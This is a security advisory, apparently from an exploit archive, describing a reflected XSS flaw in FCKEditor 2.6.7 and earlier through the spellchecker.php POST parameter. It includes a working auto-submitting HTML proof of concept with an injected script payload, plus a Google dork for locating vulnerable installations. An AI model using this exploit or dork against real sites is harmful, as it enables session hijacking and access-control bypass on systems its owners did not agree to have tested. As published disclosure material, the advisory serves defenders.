FCKEditor <= 2.6.7 reflected XSS vulnerability

2012-06-26 / 2012-08-15
Credit: Emilio Pinna
Risk: Low
Local: No
Remote: Yes
CWE: CWE-79


CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

# Product: FCKEditor # Vendor site: http://ckeditor.com/ # Affected versions: FCKEditor <= 2.6.7 # Product description: WYSIWYG Text and HTML Editor for the Web # Author: Emilio Pinna - ncl 01 _at_ email _dot_ it # Blog site: http://disse.cting.org # Date: 13/06/2012 This software is a popular as stand-alone application as WordPress/Joomla/Drupal extensions and embedded as editor in of web applications. Developing is dismissed from 2009 but was spreaded for more than six years and Google counts more than 1,5 billion of results. A plausbile Google dork filtering out PHP sources could be: # inurl:fck_spellerpages/spellerpages/server-scripts/ -"The following variables" File "spellchecker.php" suffer from XSS vulnerabilities in line 27. Attackers can exploit these weaknesses to execute arbitrary HTML and script code in a user's browser session that visit resulting in a cookie stealing and bypass of admin access controls. Exploit is CRSF-like due to POST vulnerable parameter. #--------- File: fsck_editor.html -----------# <html> <body> <iframe style="width: 1px; height: 1px; visibility: hidden" name="hidden"></iframe> <form method="post" name="sender" action="http://vuln.com//fckeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php"; target="hidden"> <input type="hidden" name="textinputs[]" value='");alert("THIS SITE IS XSS VULNERABLE!");</script><!--' /> </form> </body> <script>document.sender.submit(); </script> </html> #-----------------------------------------------------#

References:

http://ckeditor.com/
http://disse.cting.org


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top